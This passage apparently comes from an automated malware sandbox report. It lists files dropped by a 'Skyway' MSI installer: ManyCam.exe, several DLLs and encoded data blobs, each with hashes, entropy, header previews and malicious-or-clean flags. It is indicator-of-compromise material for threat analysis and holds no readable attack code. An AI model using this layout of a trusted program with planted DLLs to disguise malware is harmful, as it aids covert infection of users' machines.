SHA-512:	FEE1255ED5548252F3B096A73213E8EACD087B03C0451DE9F0FC5AB16B41296447BFBB16BA562994A0D7E9B680EBBB2FA8B13A74B5F212E5FD3551D2E5B0EF69
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(".IL..IL..IL..1O..IL..1I..IL..1H..IL...O..IL...H..IL...I..IL..IM..IL...O..IL..IL..IL.....IL...N..IL.Rich.IL.........PE..d....j.Z.........."..........v......<..........@..........................................`..........................................................P....... ...)...........`..<...............................(...@...@...............P............................text...P........................... ..`.rdata..............................@..@.data...............................@....pdata...)... .....................@..@.rsrc........P......................@..@.reloc..<....`......................@..Brwtv.........p.....................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gjs_channel_x86\CrashRpt.dll

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123976
Entropy (8bit):	6.382577198291231
Encrypted:	false
SSDEEP:	3072:fzjKVg7GOfS5SqPcCXA4SQlah+8Z4OAAHWTtopW+Z:fzjKVg7GOESqPcCXxT8hhZ4OAAHW2Wa
MD5:	B2D1F5E4A1F0E8D85F0A8AEB7B8148C7
SHA1:	871078213FCC0CE143F518BD69CAA3156B385415
SHA-256:	C28E0AEC124902E948C554436C0EBBEBBA9FC91C906CE2CD887FADA0C64E3386
SHA-512:	1F6D97E02CD684CF4F4554B0E819196BD2811E19B964A680332268BCBB6DEE0E17B2B35B6E66F0FE5622DFFB0A734F39F8E49637A38E4FE7F10D3B5182B30260
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................W.....U.....U.............U.......U.......U.....U.....U....Rich....................PE..L.....M...........!................'........ ......................................Gb..............................P........t..........d%..............H...........`$..............................0W..@............ ...............................text...8........................... ..`.rdata../l... ...n..................@..@.data...t...........................@....rsrc...d%.......&..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1756232
Entropy (8bit):	6.047140524753333
Encrypted:	false
SSDEEP:	49152:wlkcF8MnJ6tdGeHzpNTxlSvQynZAWBM2FU+SrzcBsWLZF5:wlf8MnJ6tdGeHzpNTxlSvfnOWC6U5Ed5
MD5:	BA699791249C311883BAA8CE3432703B
SHA1:	F8734601F9397CB5EBB8872AF03F5B0639C2EAC6
SHA-256:	7C4EB51A737A81C163F95B50EC54518B82FCF91389D0560E855F3E26CEC07282
SHA-512:	6A0386424C61FBF525625EBE53BB2193ACCD51C2BE9A2527FD567D0A6E112B0D1A047D8F7266D706B726E9C41EA77496E1EDE186A5E59F5311EEEA829A302325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R..R..R..f]..R..2...R....R....R....R....R..R..Q.....R....R....R..Rich.R..........................PE..L...e..M............................\|B............@.................................f.........P......................................@..................H............................................d..@............................................text...b........................... ..`.rdata..B...........................@..@.data........P.......P..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gjs_channel_x86\cv099.dll

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	679936
Entropy (8bit):	6.674616014554414
Encrypted:	false
SSDEEP:	12288:dHxL34kbwAQR5+ERTJGZfnpyvhZFjtJbPbwQjtX5ooVyPMDFdqvGHjucsEUNwm/7:dzbwAQR57RJGoxjP7/2+HINwwb
MD5:	2A8B33FEE2F84490D52A3A7C75254971
SHA1:	16CE2B1632A17949B92CE32A6211296FEE431DCA
SHA-256:	FAFF6A0745E1720413A028F77583FFF013C3F4682756DC717A0549F1BE3FEFC2
SHA-512:	8DAF104582547D6B3A6D8698836E279D88AD9A870E9FDD66C319ECADA3757A3997F411976461ED30A5D24436BAA7504355B49D4ACEC2F7CDFE10E1E392E0F7FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.IO.q'..q'..q'...Y..q'.:.J..q'.:.Z..q'.:.\..q'..q&..q'.:.I.#q'.:.]..q'.:.[..q'.:._..q'.Rich.q'.........PE..L.....YM...........!.........p..........................................................................................a+......P.......,.......................T9..P...................................@...............,............................text............................... ..`.rdata..............................@..@.data...........0..................@....rsrc...,...........................@..@.reloc...:.......@... ..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gjs_channel_x86\cxcore099.dll

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	929792
Entropy (8bit):	6.883111719944197
Encrypted:	false
SSDEEP:	24576:dNoLaQGpXDCfZCgs1ruSteHz3+AzEOyIrbnYyw:7msgUeTGIrbM
MD5:	286284D4AE1C67D0D5666B1417DCD575
SHA1:	8B8A32577051823B003C78C86054874491E9ECFA
SHA-256:	37D9A8057D58B043AD037E9905797C215CD0832D48A29731C1687B23447CE298
SHA-512:	2EFC47A8E104BAA13E19BEE3B3B3364DA09CEA80601BC87492DE348F1C8D61008002540BA8F0DF99B2D20E333D09EA8E097A87C97E91910D7D592D11A953917A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&......&......&............&......&......&......&.....Rich...........PE..L...w.YM...........!......... .......................................................d..................................b(......d....@..4....................P...e......................................@...............H............................text............................... ..`.rdata..b/.......0..................@..@.data........@...p...@..............@....rsrc...4....@......................@..@.reloc...g...P...p..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gjs_channel_x86\cximagecrt.dll

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498760
Entropy (8bit):	6.674124910838454
Encrypted:	false
SSDEEP:	12288:fJaqPgrHZx0Cxn0P5ASCH8aH6IAC+tITsQ8p:fkqPgr5x0Cxn0P5ASCH8aaIACDTx8p
MD5:	C36F6E088C6457A43ADB7EDCD17803F3
SHA1:	B25B9FB4C10B8421C8762C7E7B3747113D5702DE
SHA-256:	8E1243454A29998CC7DC89CAECFADC0D29E00E5776A8B5777633238B8CD66F72
SHA-512:	87CAD4C3059BD7DE02338922CF14E515AF5CAD663D473B19DD66A4C8BEFC8BCE61C9C2B5A14671BC71951FDFF345E4CA7A799250D622E2C9236EC03D74D4FE4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B2/..SA[.SA[.SA[..?[.SA[!.<[.SA[!.:[.SA[.S@[.SA[!.,[ISA[!./["SA[!.;[.SA[!.9[.SA[Rich.SA[................PE..L......M...........!.........`......]........ ......................................a!..................................#U..t...x....@..................H....P... ..p"..............................@...@............ ..X............................text............................... ..`.rdata....... ....... ..............@..@.data...<....0.......0..............@....rsrc........@.......@..............@..@.reloc..n!...P...0...P..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gjs_channel_x86\dbghelp.dll

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	489984
Entropy (8bit):	6.621181912245107
Encrypted:	false
SSDEEP:	6144:HPEKP8f7yHkluOutwm5ZNetC5IlhhM1yFWgQK7x5Iz4JxRRAuUzT/9cl84S683Wb:HPrX5ZNG2yQycw5IGxRwVc6683Wb/n
MD5:	AA1594596FA19609555E317D9B64BE6A
SHA1:	924B08D85B537BE52142965C3AD33C01B457EA83
SHA-256:	5139413EA54DEE9EC4F13B193D88CCAE9ADB8F0D8C1E2BA1AEE460D8A0D5BB79
SHA-512:	759209846039D1EFB2F6DDF3501F1F868989E81752BB7D617AFD9FD4238C52162167B1A1732EC81BDFCE469856C78439CC7C8D173B1F48DE499DFEE725B192DC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`..`..`.....I.....b..`........k......g.....p.....a......a.....w.....a..Rich`..........PE..L.....m=...........!................5l............Qm................................................................0.......$...x....P.......................`...K..@................................................................................text............................... ..`.data...,@.......*..................@....rsrc........P......................@..@.reloc...e...`...f..................@..B..m=8...(.m=C...(.m=P.......Z...(.m=f...).m=s...........msvcrt.dll.KERNEL32.dll.NTDLL.DLL.VERSION.dll.ADVAPI32.dll.RPCRT4.dll...................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gjs_channel_x86\gxfiogr

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	52497
Entropy (8bit):	4.634957678200076
Encrypted:	false
SSDEEP:	1536:eHvrL3y27GIffhDSwOT+vdBFysPqPni6ajhz:orzy2RI6vJyWqGz
MD5:	B590C33DD2A4C8DDEDDA46028181A405
SHA1:	B0949A3396D84B8E4DCA5D5026EB3B6C0679F7E3
SHA-256:	862AADCB096647394A5F6F5E646BF57B52567180505B6026E59539F6DED1EAA8
SHA-512:	E72B33CA405B551532A855A74F99AAB1850756CBAEFB9421D6E480E719B6CEEAD1D728DBC786D76D91532F0BBDCC241039DAC35479BF90F7D2D665C6AB9F8DA7
Malicious:	false
Preview:	..OK......lRL......O...O.gmXe..VZ....h.UA.tW....S.f....T..U.D.Gi.I..G..R..aw.`.HnU.....fOU...D.a...M.l`OiF`J....Ii....H.L.CdQAZ.N..F....bV.KlU.HG.Al...aP^..._`.xbN.....]...UX...s[r...GT.x.wL....BU.ev..cQ.q.......V..[Owfl.JL.gf.E...F..Xo.yd..[f.QCTjHt..Ua.y......Z.i..P.pv._V....AO.S..chT....P.D..w.ks._.wp...^D.Sy...M..a..ip`TG^a.........m.\A..hm..u..A.jd.KFPa...Gd..qWGZ....O.Y...U..._..I.FEhHWtD.].D..s.a...yeH...g..l...x....j...Xn.v.Uf....[..Dvp.c..t..V.ODI.M.].IWE.M..Td.....y.c..G_.cKI.T^X.y......I_P.d.h..CeZ..]...qHpf.A.iPtxRf...Y....Fi.pr..L.C.jRX\...Wu.F.eP.Lr.j.J.A....h..nWQ.o.[\r...V_..M..d._..`..]XM.e.Vb.PxJ.ai..I].Aqa..k.\.LL.R...O...D..uDs.fVs.i.l...S.J.f.UJT.TKcPZnUo.dZda.hm..P.anWu...n...j..d.].D...h...r.N.....Mk...e]`..wyk.e..s..M[.w..[.gA.oEY..d..W.sR.X..IdJ.X.hNrCR\.S...Mryj...w._K..r_.^`N.UDt..emtt..r.O..D.h....m.m.p.UiOY^a.........kP...FX..g..sIB..A...v...P\...I..eW..I..B.l.E..I..L.SVaHr.....y...P.......rTuj.aAnF.A.G.R..C....KF...TH.SB.Fm....Mn..LY..Mx..cBiF.G.....FQRr..

C:\Users\user\AppData\Roaming\gjs_channel_x86\highgui099.dll

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	397312
Entropy (8bit):	6.672405371278951
Encrypted:	false
SSDEEP:	12288:J+7gXTkVRt1dixRtVq2EjMS2E7ETstO/:JlTeRt1dSzd4MSUTsO/
MD5:	A354C42FCB37A50ECAD8DDE250F6119E
SHA1:	0EB4AD5E90D28A4A8553D82CEC53072279AF1961
SHA-256:	89DB6973F4EC5859792BCD8A50CD10DB6B847613F2CEA5ADEF740EEC141673B2
SHA-512:	981C82F6334961C54C80009B14A0C2CD48067BAF6D502560D508BE86F5185374A422609C7FDC9A2CDE9B98A7061EFAB7FD9B1F4F421436A9112833122BC35059
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r\|..6...6...6......4......;......5....;..n......#...6..........."......7......7......7...Rich6...........PE..L.....YM...........!.........@......y........................................ .......r.............................. K..F....9..........d........................#..`...................................................D............................text............................... ..`.rdata..f...........................@..@.data...0r...`...p...`..............@....rsrc...d...........................@..@.reloc...$.......0..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gjs_channel_x86\rsjddfw

Download File

Process:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	1073822
Entropy (8bit):	7.922156415332642
Encrypted:	false
SSDEEP:	24576:7JMc50r5Zz+16+mE3sgl92t2sOx0XUe/dxplKAMt9DZdr7b4P6ZkUP:KH5Zd5Exl9W2H0XUcxpc9DPfNZkUP
MD5:	6661E1E837A5BB238D7E427B0788D6C8
SHA1:	4C7B26F251169780C8407A19B2AAD12FA88A5FCD
SHA-256:	D2668722A26848BCE20E2D9CFEE8A773F076AAB009BA8601EA65D142C4C1E1DA
SHA-512:	D6D562D28938275D2F7CCBCAC9F2EA9A1FE9BB572B1A01A719D08730D87A0A9400F30A71B1EB25D4671B7DB786FE92A899D485F28E73FBA2A75B9159C79D99D0
Malicious:	false
Preview:	.pD.a..yb.m...vXcH.F.XKTH.G`CD.gH.vuclG...nfpiR.c....A..E.A.O..i....qU..........NpEhaYl.g....Jkn..M...t.av`FXR....Eks...MgLkQ[S.^.VP.FQm_.ID_...RQ.sXS.].peAP.hof...Vv].t.LS_B.ytg`x.pXc..A.Dy.JAJ.h..]S..Ai.r.ES.............O...lw..QjB.EOCP.K..^..hwT.t..].O.A..[.K..i^.l.F..U.ENyG...o..S.......Xe`UuO.J....._WyE.b.F.Y..vRm.k`VUwt.c.y.QG.[o.W..M...h.Y\.E....Y.OJDr.l..c.H.....vsAh.....A...c..d^cn..h.M.[.y..TLw.h.nZV..jcO[_.u...]...xBmIG..n.YAT...ux.aK.x...sw.....\..Vf...F..Pc.h..dk..tP_I..x.G^....A.....Ew..gAH..T..oyx....u.A.L..G...w..oxe...t.Di...m.xrg.wPb.k.H.Bc\..M.Xu.J.P.V.akF....Ca.N`T..I.....B...w..S.P....y\aAe...EcJSrR`c.gMfMu..e...x.Z.vhwf.R..I.x...Ga.n.P.e.cS......._ts...j..q....q.e..\...\pKM.sZYo....[.n....M.tT..eaIgfd.yG.....bR.......B.p....ic.e..yVsM...no.wn^B..dDf..Ih_p...b..Y.H....fTZ.c...Odby..v.u...I..j.DR.DSrW.O.r...bw..QhPcp....uv.b.o.``aJVoq..L..B...k....H_X..UC..ERB.ko.ek.X....WTM.w.u...ZOt....sJ.O.N.E..Bd.yy\.q.Yu..GP.i..g.Cv.E`.....j.b...KcX..P......axhk.dY..yv...tKSDR\

C:\Windows\Installer\5fd64d.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Skyway, Author: Nightline Curlicue, Keywords: Installer, Comments: This installer database contains the logic and data required to install Skyway., Template: Intel;1033, Revision Number: {C2411C2F-1F57-4746-A7B0-9045F077EB67}, Create Time/Date: Wed Oct 9 10:51:28 2024, Last Saved Time/Date: Wed Oct 9 10:51:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
Category:	dropped
Size (bytes):	2850816
Entropy (8bit):	7.992768771716366
Encrypted:	true
SSDEEP:	49152:fiSoOl+YyNuCClJkqr6zeM4I/157fW8KvPRlep0IzM/d/c1Adfz3GcduofnQ:ft7+YJCCvkP4Id59KvbVqMlCq73Gcdm
MD5:	2DE2B3C8FA96E43890E49ECBFE0ECCB0
SHA1:	CE46EA6169C109297D2B09EF9B240AFFE6623037
SHA-256:	9CD2698D22EA6C144489B104D7D4680392F5EC333791FE164090B513B3073A7C
SHA-512:	9E6D81600B4A6F0F9F2B9BE58CF22074DDC81E0740A632C6775BBFA050E000E6E9B17077360AB1CBBB1238C90ECDD982B5594EF1AF87F1A364AA21EDF4D60473
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\5fd64f.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Skyway, Author: Nightline Curlicue, Keywords: Installer, Comments: This installer database contains the logic and data required to install Skyway., Template: Intel;1033, Revision Number: {C2411C2F-1F57-4746-A7B0-9045F077EB67}, Create Time/Date: Wed Oct 9 10:51:28 2024, Last Saved Time/Date: Wed Oct 9 10:51:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
Category:	dropped
Size (bytes):	2850816
Entropy (8bit):	7.992768771716366
Encrypted:	true
SSDEEP:	49152:fiSoOl+YyNuCClJkqr6zeM4I/157fW8KvPRlep0IzM/d/c1Adfz3GcduofnQ:ft7+YJCCvkP4Id59KvbVqMlCq73Gcdm
MD5:	2DE2B3C8FA96E43890E49ECBFE0ECCB0
SHA1:	CE46EA6169C109297D2B09EF9B240AFFE6623037
SHA-256:	9CD2698D22EA6C144489B104D7D4680392F5EC333791FE164090B513B3073A7C
SHA-512:	9E6D81600B4A6F0F9F2B9BE58CF22074DDC81E0740A632C6775BBFA050E000E6E9B17077360AB1CBBB1238C90ECDD982B5594EF1AF87F1A364AA21EDF4D60473
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSID7A5.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	3640
Entropy (8bit):	5.616383281365577
Encrypted:	false
SSDEEP:	96:5rFrkrI6obY43wlwucceYwRNe6yoWcZ2xLDIEPrptL:5rCrItU43wlwBdYwje6qDIWj
MD5:	4DC1463C550F1194406A160551DF8D3D
SHA1:	9C9820BB045C322D6BEF5C518D700AE7C6666AAD
SHA-256:	1C6A57A27A578792DE7CB6C0A56E033581FDDEE23AFE8415374F09DF441EBEFC
SHA-512:	38FBA111C95E36972E5F4DA75E462E22007D4C90A085D6CA513598F967A184D4A0517DF4C178BD638CDCF502D93068867EC2087FDEAAD654782B7F998EC8DD7B
Malicious:	false
Preview:	...@IXOS.@.....@.1RY.@.....@.....@.....@.....@.....@......&.{C71E1024-3B5C-4357-ACD5-CB38070D632B}..Skyway..kvW4hZu9JA.msi.@.....@.....@.....@........&.{C2411C2F-1F57-4746-A7B0-9045F077EB67}.....@.....@.....@.....@.......@.....@.....@.......@......Skyway......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{7214B7BC-5375-5A23-81FA-7D5AA7A3DBDA}/.C:\Users\user\AppData\Local\Hazan\CrashRpt.dll.@.......@.....@.....@......&.{33110924-66D7-5B68-8143-9AD3793F63F9},.C:\Users\user\AppData\Local\Hazan\cv099.dll.@.......@.....@.....@......&.{F06CBCF3-C291-5AEF-8D88-CBFDBF1E7AF9}0.C:\Users\user\AppData\Local\Hazan\cxcore099.dll.@.......@.....@.....@......&.{5A74A4FB-F8B3-58D4-B45B-E88123F2B0FC}1.C:\Users\user\AppData\Local\Hazan\cximagecrt.dll.@.......@.....@.....@......&.{AE297845-2E04-5EE6-A0ED-C1B2B2042087}..C:\Users\user\AppData\Local\Hazan\dbghelp.dll.@..

C:\Windows\Installer\SourceHash{C71E1024-3B5C-4357-ACD5-CB38070D632B}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1643556847595167
Encrypted:	false
SSDEEP:	12:JSbX72Fj5AGiLIlHVRpZh/7777777777777777777777777vDHFHIU/U/it/l0i5:JTQI5tD1iF
MD5:	E53F2748DA104DE4E93A8570CA2EB9A4
SHA1:	8A435C676AA6CDCE01819A8BA86939C178AA9AF3
SHA-256:	96ADCAA1F6B87E8639B077DF3D8D46BBDE5336492C0C472C073B0779D270724D
SHA-512:	B658C0E944FEE538F7F0D491A3C38E656186CED41F5FACF457319E72D1F6C51102B083045C9EB2854F8C5C901BCDCE26AEDE21061E1BAC3CDD64E6262A5295F7
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4665837081119206
Encrypted:	false
SSDEEP:	48:Z8Ph2uRc06WXJ0jT5OWy9mS5okrw9mSIR5S:Uh213jTPxAW
MD5:	B2C9C22941383F40D5712A8F54C7D10C
SHA1:	45D1A2DE54DD99944C6A854BB0C0DD0D528BA7C8
SHA-256:	8011F922ED222178D3C9749567857CF91665067E566812C907FF2B4F21FE8933
SHA-512:	6B3489AB16BB75D76986B75F6102D85B9AA8E3B696472B983466F442B6551C5BE50D57387C3537B63FDFF890607038721FA6E05BC389587D518A2FEA20719D7E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375156146407132
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauh:zTtbmkExhMJCIpErQ
MD5:	4621ED7DA3275A2F231E43FDAF43B699
SHA1:	A6CC9CE18FB374C3037AC13F446730AECE43B2EE
SHA-256:	B2C229D0CA77FD5743D842355CCE07DFCF16B158356BAF45BC99AA142851A200
SHA-512:	24F8547307DE2DAB8C77FB6B8F75CD1DD98867EF4AE6FEEC4A96A1B9F9864207D587404AABCC54D83766261E3330C530BEBC370D04AD8304989E01C82B44F826
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF241AC276581EBB26.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07181255648896535
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOHIU5FUHC7gVky6lit/:2F0i8n0itFzDHFHIU/UMit/
MD5:	E0C63468340FE48A080A6988FE53D006
SHA1:	2909AFDD28EDEA6BAEF1DECA55E15CC11E7F6767
SHA-256:	652864594DFAC9FBC8B32E47D4C09DC89D89EFA79BBF09EAB436814AE4910AB6
SHA-512:	7DBC116AD0F072573B93C269DACDF159F7DE139C16E0018385851D390B959CBEFBFD080B25B0C2BDD6A126FDD67E09BA65B310979936A1305754EF242333210F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2AFDB88DD3516A07.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1822463460178916
Encrypted:	false
SSDEEP:	48:gheuJJveFXJPT5AWy9mS5okrw9mSIR5S:oed3TdxAW
MD5:	1E33E41F62133663D1B43B65C0807479
SHA1:	C027D2EB25CA69A056E7E8E9657FDFE7E7E9CEAB
SHA-256:	35E5C3484D6A2DA39380C3599AB0032402885FA85E423B9FA7798CFADB2B61AB
SHA-512:	7572476C74391154E6739B2623A6E6AF87B18E26028DF377C2064655065DD16A6FCD4C9C3B31185F504C0600A7BE385984A8C6CED9C4E39E706FF19BC9BEEDDF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2C2FD40BB82B7078.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4AC130F136D82CAB.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4665837081119206
Encrypted:	false
SSDEEP:	48:Z8Ph2uRc06WXJ0jT5OWy9mS5okrw9mSIR5S:Uh213jTPxAW
MD5:	B2C9C22941383F40D5712A8F54C7D10C
SHA1:	45D1A2DE54DD99944C6A854BB0C0DD0D528BA7C8
SHA-256:	8011F922ED222178D3C9749567857CF91665067E566812C907FF2B4F21FE8933
SHA-512:	6B3489AB16BB75D76986B75F6102D85B9AA8E3B696472B983466F442B6551C5BE50D57387C3537B63FDFF890607038721FA6E05BC389587D518A2FEA20719D7E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6DB88BEEE7CDAC8B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF71CACD3AE9CFDE61.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.10437003880396546
Encrypted:	false
SSDEEP:	24:DnZwRD9B9mipVM9mipV7V2BwGClrkg9n+7:FwR5B9mSK9mS5okrVS
MD5:	E969631E4B6F301EF0E91834679180A0
SHA1:	24015E779F80FFACC1E478CDA29CF90E7EFD8B0B
SHA-256:	670A019A695A085DF7C23739677981DEC84ED407EF4F7708D74912DF4C506F97
SHA-512:	BBB57C176FEFC751537B16CD44896D21AAC1208456B2582FB73B53760157A722A85963059E3ECF9136E54C1D71BE17B70D4839D3511404A07470F27054AAB846
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF78B0F00083CEA680.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1822463460178916
Encrypted:	false
SSDEEP:	48:gheuJJveFXJPT5AWy9mS5okrw9mSIR5S:oed3TdxAW
MD5:	1E33E41F62133663D1B43B65C0807479
SHA1:	C027D2EB25CA69A056E7E8E9657FDFE7E7E9CEAB
SHA-256:	35E5C3484D6A2DA39380C3599AB0032402885FA85E423B9FA7798CFADB2B61AB
